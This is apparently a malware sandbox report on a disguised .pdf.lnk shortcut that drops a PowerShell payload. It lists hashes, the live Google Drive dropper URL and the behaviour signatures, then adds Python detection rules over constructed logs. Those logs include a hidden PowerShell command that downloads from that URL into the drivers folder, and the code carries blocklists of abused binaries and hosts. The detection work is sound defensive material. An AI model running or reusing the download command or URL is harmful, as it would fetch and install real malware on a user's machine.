General

  • Target

    ovJu9rmRU4W9y.pdf.lnk

  • Size

    3KB

  • Sample

    240126-tlpnwshdc9

  • MD5

    8f524aef0771d921ab1df779337a48b0

  • SHA1

    307e0fc5316bd346046e7248b737f21abd426024

  • SHA256

    93101ad1d5c18033ba802143a1321b8e378412d4f34846d4f68eb8024b779691

  • SHA512

    41cdfad40c41c295af46f551c381da709ea7d87846be859f61014fe34f3bc80da3c5c2580be3eee1de517e72bc3695cf42b53afb226de151821fadb912d87911

Score
10/10

Malware Config

  • Extracted

    Language        ps1
    Deobfuscated
    URLs
      ps1.dropper   https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u

Targets

    • Target

      ovJu9rmRU4W9y.pdf.lnk

    • Size

      3KB

    • MD5

      8f524aef0771d921ab1df779337a48b0

    • SHA1

      307e0fc5316bd346046e7248b737f21abd426024

    • SHA256

      93101ad1d5c18033ba802143a1321b8e378412d4f34846d4f68eb8024b779691

    • SHA512

      41cdfad40c41c295af46f551c381da709ea7d87846be859f61014fe34f3bc80da3c5c2580be3eee1de517e72bc3695cf42b53afb226de151821fadb912d87911

    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2
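    The five behaviour signatures above map directly onto detection rules over endpoint telemetry. The block below is an added example, not the sandbox vendor's signature code: it parses constructed, Sysmon-like key=value records and raises one finding per signature. Only the .lnk name and the Google Drive download URL come from the report; the PowerShell command line, the dropped-file name, the process IDs and the registry value read (a locale value under HKCU\Control Panel\International) are assumptions, since the report does not say which key the sample queries or what it writes.

```python
"""Toy detection rules for the behaviours listed in the sandbox report.

Added example; not the sandbox's own signature logic. The log records are
constructed to resemble Sysmon-style key=value events and are not real
telemetry from the analysed sample.
"""
import re
from urllib.parse import urlparse

# Constructed records. Report-derived: the .lnk name and the Drive URL.
# Assumed for illustration: command line, dropped file name, PIDs, registry value.
SAMPLE_LOG = r'''
Event=ProcessCreate ProcessId=4120 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell.exe -w hidden -ep bypass -c iwr https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u -OutFile C:\Windows\System32\drivers\dropped.exe (launched via ovJu9rmRU4W9y.pdf.lnk)"
Event=RegistryRead ProcessId=4120 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" TargetObject="HKCU\Control Panel\International\LocaleName"
Event=NetworkConnect ProcessId=4120 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" DestinationHostname=drive.google.com DestinationPort=443
Event=FileCreate ProcessId=4120 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" TargetFilename="C:\Windows\System32\drivers\dropped.exe"
Event=ProcessCreate ProcessId=4388 Image="C:\Windows\System32\drivers\dropped.exe" ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="dropped.exe"
Event=ProcessCreate ProcessId=4400 Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad.exe"
'''

# key=value pairs; values may be double-quoted (and then may contain spaces).
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
URL_RE = re.compile(r'https?://[^\s"\']+')

# Analyst-chosen lists (assumptions): script hosts that should rarely talk to
# the internet, and file-sharing hosts commonly abused as first-stage hosting.
BLOCKLISTED = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
               "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
ABUSED_HOSTS = {"drive.google.com", "docs.google.com", "dl.dropboxusercontent.com",
                "raw.githubusercontent.com", "cdn.discordapp.com"}
DRIVERS_DIR = "c:\\windows\\system32\\drivers\\"
# Locale/region keys a geofence check would read (assumed; report does not name the key).
GEO_KEY_FRAGMENTS = ("\\control panel\\international\\",)


def parse_line(line):
    """Turn one key=value record into a dict, stripping surrounding quotes."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in FIELD_RE.finditer(line)}


def parse_log(text):
    return [parse_line(l) for l in text.strip().splitlines() if l.strip()]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hosts_in(text):
    """Hostnames of every URL embedded in a command line."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def evaluate(events):
    """Return {signature name: [matching events]} for the report's five signatures."""
    hits = {}
    created_files = set()   # files written earlier in the trace, for the dropped-EXE rule

    def hit(name, ev):
        hits.setdefault(name, []).append(ev)

    for ev in events:
        kind = ev.get("Event")
        image = ev.get("Image", "")

        if kind == "NetworkConnect" and basename(image) in BLOCKLISTED:
            hit("Blocklisted process makes network request", ev)

        hosts = hosts_in(ev.get("CommandLine", ""))
        if kind == "NetworkConnect":
            hosts.add(ev.get("DestinationHostname", "").lower())
        if hosts & ABUSED_HOSTS:
            hit("Legitimate hosting services abused for malware hosting/C2", ev)

        if kind == "FileCreate":
            target = ev.get("TargetFilename", "").lower()
            created_files.add(target)
            if target.startswith(DRIVERS_DIR):
                hit("Drops file in Drivers directory", ev)

        if kind == "RegistryRead" and any(
                frag in ev.get("TargetObject", "").lower() for frag in GEO_KEY_FRAGMENTS):
            hit("Checks computer location settings", ev)

        # Image of a new process equals a path this trace saw being written.
        if kind == "ProcessCreate" and image.lower() in created_files:
            hit("Executes dropped EXE", ev)

    return hits


if __name__ == "__main__":
    for name, evs in evaluate(parse_log(SAMPLE_LOG)).items():
        print(f"{name}: {len(evs)} event(s), PIDs {[e.get('ProcessId') for e in evs]}")
```

    The dropped-EXE rule is stateful on purpose: it only fires when the executed image was written earlier in the same trace, which is what separates "executes dropped EXE" from any ordinary process start. The hosting rule matches both the command line and the actual connection, so the Drive URL is caught even if the download is never completed.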

MITRE ATT&CK Enterprise v15

Tasks